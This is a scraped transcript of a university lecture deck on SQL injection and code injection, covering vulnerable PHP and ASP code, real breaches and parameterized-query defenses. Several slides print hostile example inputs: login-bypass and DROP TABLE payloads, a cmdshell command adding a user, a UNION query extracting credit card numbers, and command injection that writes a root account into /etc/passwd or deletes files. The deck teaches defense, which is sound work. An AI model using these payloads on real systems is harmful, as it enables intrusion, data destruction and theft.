Presentation is loading. Please wait.

Presentation is loading. Please wait.

1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.

Published byAileen Hensley Modified over 9 years ago

Similar presentations

Presentation on theme: "1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009."— Presentation transcript:

1 1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009

2 Common vulnerabilities SQL Injection Browser sends malicious input to server Bad input checking leads to malicious SQL query XSS – Cross-site scripting Bad web site sends innocent victim a script that steals information from an honest web site CSRF – Cross-site request forgery Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site Other problems HTTP response splitting, bad certificates, … 2 Sans Top 10

3 : : General code injection attacks Enable attacker to execute arbitrary code on the server Example: code injection based on eval (PHP) http://site.com/calc.php (server side calculator) $in = $_GET[‘exp']; eval('$ans = '. $in. ';'); Attack: http://site.com/calc.php?exp=“ 10 ; system(‘rm *.*’) ” 3 (URL encoded)

4 Code injection using system() Example: PHP server-side code for sending email Attacker can post OR $email = $_POST[“email”] $subject = $_POST[“subject”] system(“mail $email –s $subject < /tmp/joinmynetwork”) http://yourdomain.com/mail.php? email=hacker@hackerhome.net & subject=foo < /usr/passwd; ls http://yourdomain.com/mail.php? email=hacker@hackerhome.net&subject=foo; echo “evil::0:0:root:/:/bin/sh">>/etc/passwd; ls

5 SQL injection 5

6 6 Database queries with PHP (the wrong way) Sample PHP $recipient = $_POST[‘recipient’]; $sql = "SELECT PersonID FROM People WHERE Username='$recipient' "; $rs = $db->executeQuery($sql); Problem: Untrusted user input ‘recipient’ is embedded directly into SQL command

7 Basic picture: SQL Injection 7 Victim Server Victim SQL DB Attacker post malicious form unintended SQL query receive valuable data 1 2 3

8 8 CardSystems Attack CardSystems credit card payment processing company SQL injection attack in June 2005 put out of business The Attack 263,000 credit card #s stolen from database credit card #s stored unencrypted 43 million credit card #s exposed

9 April 2008 SQL Vulnerabilities

10 Main steps in this attack Use Google to find sites using a particular ASP style vulnerable to SQL injection Use SQL injection on these sites to modify the page to include a link to a Chinese site nihaorr1.com Don't visit that site yourself! The site (nihaorr1.com) serves Javascript that exploits vulnerabilities in IE, RealPlayer, QQ Instant Messenger Steps (1) and (2) are automated in a tool that can be configured to inject whatever you like into vulnerable sites 10

11 11 Example: buggy login page (ASP) set ok = execute( "SELECT * FROM Users WHERE user=' " & form(“user”) & " ' AND pwd=' " & form(“pwd”) & “ '” ); if not ok.EOF login success else fail; Is this exploitable?

12 Web Server Web Browser (Client) DB Enter Username & Password SELECT * FROM Users WHERE user='me' AND pwd='1234' Normal Query

13 13 Bad input Suppose user = “ ' or 1=1 -- ” (URL encoded) Then scripts does: ok = execute( SELECT … WHERE user= ' ' or 1=1 -- … ) The “--” causes rest of line to be ignored. Now ok.EOF is always false and login succeeds. The bad news: easy login to many sites this way.

14 14 Even worse Suppose user = “ ′ ; DROP TABLE Users -- ” Then script does: ok = execute( SELECT … WHERE user= ′ ′ ; DROP TABLE Users … ) Deletes user table Similarly: attacker can add users, reset pwds, etc.

15 15

16 16 Even worse … Suppose user = ′ ; exec cmdshell ′ net user badguy badpwd ′ / ADD -- Then script does: ok = execute( SELECT … WHERE username= ′ ′ ; exec … ) If SQL server context runs as “sa”, attacker gets account on DB server.

17 17 Getting private info

18 “SELECT pizza, toppings, quantity, date FROM orders WHERE userid=”. $userid. “AND order_month=”. _GET[‘month’] SQL Query What if: month = “ 0 AND 1=0 UNION SELECT name, CC_num, exp_mon, exp_year FROM creditcards ”

19 19 Results Credit Card Info Compromised

20 Preventing SQL Injection Never build SQL commands yourself ! Use parameterized/prepared SQL Use ORM framework

21 21 Parameterized/prepared SQL Builds SQL queries by properly escaping args: ′  \′ Example: Parameterized SQL: (ASP.NET 1.1) Ensures SQL arguments are properly escaped. SqlCommand cmd = new SqlCommand( "SELECT * FROM UserTable WHERE username = @User AND password = @Pwd ", dbConnection); cmd.Parameters.Add(" @User ", Request[“user”] ); cmd.Parameters.Add(" @Pwd ", Request[“pwd”] ); cmd.ExecuteReader(); In PHP: bound parameters -- similar function

22 22 0x 5c  \ 0x bf 27  ¿′ 0x bf 5c  PHP addslashes () PHP: addslashes ( “ ’ or 1 = 1 -- ”) outputs: “ \’ or 1=1 -- ” Unicode attack: (GBK) $user = 0x bf 27 addslashes ($user)  0x bf 5c 27  Correct implementation: mysql_real_escape_string() ′

Download ppt "1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009."

Similar presentations

Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
CS 142 Lecture Notes: Injection AttacksSlide 1 Unsafe Server Code advisorName = params[:form][:advisor] students = Student.find_by_sql( SELECT students.*

CS 142 Lecture Notes: Injection AttacksSlide 1 Unsafe Server Code advisorName = params[:form][:advisor] students = Student.find_by_sql( "SELECT students.*
Common Exploits Aaron Cure Cypress Data Defense. SQL Injection.

Common Exploits Aaron Cure Cypress Data Defense. SQL Injection.
1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.

1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Project 7 Discussion Section XSS and SQL Injection in Rails.

Project 7 Discussion Section XSS and SQL Injection in Rails.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Multiple Tiers in Action

Multiple Tiers in Action
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.

Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
Varun Sharma Security Engineer | ACE Team | Microsoft Information Security

Varun Sharma Security Engineer | ACE Team | Microsoft Information Security
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.

Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.
1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.

1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.
Workshop 3 Web Application Security Li Weichao March 14 2014.

Workshop 3 Web Application Security Li Weichao March
PHP Security.

PHP Security.
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report 2014 https://info.cenzic.com/2013-Application-Security-Trends-Report.html.

Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report

Similar presentations

Ads by Google